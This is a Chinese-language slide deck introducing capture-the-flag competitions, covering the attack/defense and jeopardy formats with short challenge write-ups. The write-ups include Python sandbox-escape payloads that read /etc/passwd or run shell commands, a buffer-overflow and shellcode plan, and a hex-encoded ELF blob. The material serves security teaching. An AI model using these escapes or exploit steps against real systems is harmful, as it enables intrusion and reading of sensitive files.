CTF介绍.pdf

Transcript

1. CTF介绍 hellok@blue-lotus

2. CTF • Capture the flag • http://ctftime.org/ • http://repo.shell-storm.org/CTF/

3. 比赛模式 • 主要有2种模式: attack/defense jeopardy. • attack/defense：攻击与防御 每个team给定一个网络。通过VPN连接起来。相互 攻击和防御 jeopardy：给定限定数量的题目

4. attack/defense

5. 时间线

6. attack/defense 服务器定时向服务发送正常报文，需要保证正常工作。+1 防御分 向别人的服务器发动攻击 成功攻击+1攻击分

7. None

8. RuCTFe 2012 Geotracker write up

9. POC

10. jeopardy • 主要题型 • binary • exploit • forensic •

    web • crypto • misc(Grag bag)

11. • 后面的分数表示题目 的分数 • 题目由赛委会决定开 启顺序或者由最先做 出的开出下一道题目

12. forensic 信息隐藏题目

13. None
14. None
15. None

16. DE9H

17. Crypto

18. 循环解密,替换

19. phdays Forensics 400

20. None
21. None
22. None

23. F100 7F454C46010000000000000000004305020003001A0043051A0043050 4000000B931004305B220CD80252000010093CD80303034333035423 2323043443830323532303030303130303933434438300A

24. from PIL import Image # Open the image in read

    mode im = Image.open('.png', 'r') # pixels is an object which allows access to # individual pixels pixels = im.load() # Get the size of the picture width, height = im.size binary_ans = '' for y in xrange(height): # Iterate through each pixel for x in xrange(width): #pixels[x, y] returns a tuple with RGB vals red_pix = pixels[x, y][0] green_pix = pixels[x, y][1] blue_pix = pixels[x, y][2] #print pixels[x, y] if red_pix == 255: binary_ans += '1' elif red_pix == 254: binary_ans += '0' if green_pix == 255: binary_ans += '1' elif green_pix == 254: binary_ans += '0' if blue_pix == 255: binary_ans += '1' elif blue_pix == 254: binary_ans += '0' # This just converts the binary to ASCII answer = '' for i in xrange(len(binary_ans)/8): answer += chr(int(binary_ans[i*8:i*8+8], 2)) f=open('answer.txt','w') f.write(answer) f.close() #print answer

25. PWN • PWN400 PHDAYS • python sandbox 逃逸

26. • python反编译后

27. 老版本的sandbox

28. ().__class__.__bases__ ().__class__.__bases__[0].__subclasses__()[40]("./key").read()

29. • Reader.func_closure[0].cell_contents.func_closure[0].cel l_contents('/etc/passwd').read() • Reader.func_globals['sys'].modules['os'].system(“cat /etc/passwd”) • Reader.func_closure[0].cell_contents.func_globals['ALL OWED_FILES'].append(‘/etc/passwd’)

30. 29c3-ctf-exploitation-200-ru1337 • 32位ELF（常常为64位） • $ nc 94.45.252.242 1024 • ID&PASSWORD

    1337NESS EVALUATION • Please enter your username and password • User: aaaaaaaaaaaaaaa • Password: bbbbbbbbbbbbbbbbbbbb • u r not s0 1337zz!!!
31. None
32. None

33. 我们要做的： 1.缓冲区溢出到ret 2.利用mprotect让我们的缓冲区有可执行权限 3.跳到缓冲区里面 4.执行shellcode（/bin/sh /bin/cat flag）

34. hack_u_too bin500 writeup • 包含简单的反调试器，算法逆向 • 1.anti调试器。通过简单的补丁等可绕过 • 2.KEY生成分为3部分,类似注册机

35. 得出： arg1 length 7 arg2 length 23

36. 得出参数1和参数2个映射关系，和参数2 的前4个字母。 其中4个变量关系如下： v13|v14=0×77 v13^v14=0×46 v14^v15=0×45 v15^v16=0x1c v15|v15=0x7c 最终有2组解v13v14v15v16组成字符串为： w1th或s5pl

37. k0hyacu fr0m_hacky0u_w1th_l0v3~

38. net100 • Find the secret link in this conversation •

    strings epicark100.pcap | grep -i key • message=some%20shit%20happend%20%20this%20su nday.%20i%20have%20downloaded • %20this%20(key- http%3A%2F%2Ftinyurl.com%2F9qj5r4r)&to=%23hacku • message=oh%2C%20sry.%20key%20is%20tinyurl.com %2F8pdox5a&to=%23hacku • mPOST /safebrowsing/downloads?client=navclient- autoffox&appver=15.0.1&pver=2.2&wrkey=AKEgNiuG_3 JPr9B41IQNypI7EAVw8oaCQtVJYpdMOG • gLKkFvOQVQtyEW3U9c28TOgCy1vXiYXUF7xQ8ssxtcl OypciYrG9RAdg== HTTP/1.1

39. net200 • What's the md5 of the file being transferred?

    • 从流中提取文件，计算MD5值 • 各种自定义协议，需要自己解包 复杂

40. drink beer challenge

41. http://ctftime.org/event/list/upcoming/

42. http://ctftime.org/writeups/